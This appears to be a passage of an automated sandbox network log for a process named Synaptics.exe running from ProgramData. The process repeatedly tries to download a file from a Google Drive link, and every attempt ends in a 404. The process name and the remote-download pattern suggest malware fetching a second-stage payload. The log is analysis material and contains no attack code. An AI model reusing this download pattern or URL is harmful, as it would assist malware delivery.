                                                                                                                                      2024-12-30 10:23:36 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:36 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-_coe0zkg7CNq1uQoaG_6Uw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      108192.168.2.549984142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:36 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      109192.168.2.549985142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:36 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      110192.168.2.549986142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:36 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:37 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC4fNsXOw2LOxqHCNCOgyYfGaUahACuTzxpUCpRf2e94KO4Z3AyfJ-uwZ7_ao_MEKJ95
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:37 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-y5SqVzsoxvKSwlq2B5I9vg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:37 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:37 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 4f 53 56 4c 58 39 65 42 54 64 59 6e 46 39 74 53 39 32 52 43 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="gOSVLX9eBTdYnF9tS92RCw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:37 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      111192.168.2.549994142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:37 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:37 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-YMj67WYuegblscM310SzSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      112192.168.2.549995142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:37 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:37 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-zgOW3__aPJUznFxe1nsPhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      113192.168.2.549996142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:37 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:38 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC6qIAKt0tAYw7GvBkbLPvtjEtuMy-DUbUU4RjFzBqdWjoDcyLViv0R1Nv1fz-H8lgHdh7ilCMc
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:37 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ZOAkT6HPPce_1-6RJ2easQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:38 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:38 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 56 53 45 39 45 59 4d 64 41 51 63 34 63 6f 36 30 31 65 77 61 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="yVSE9EYMdAQc4co601ewag">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:38 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      114192.168.2.550002142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:38 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:39 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:38 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-lALdiWS9zp6lRLrQVME-bA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      115192.168.2.550003142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:38 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:39 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC6w5uigjrW9kriK7rVMEBmuSa14F-uwo4v1Xn595ZO1RBk11YxamTMsKwnJQEnmyiIe
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:39 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Lm5OuHaBb70nD6jFd5DyQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:39 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:39 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 32 59 30 4e 66 42 59 57 4a 44 78 73 69 33 5a 62 32 65 4d 6c 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="02Y0NfBYWJDxsi3Zb2eMlA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
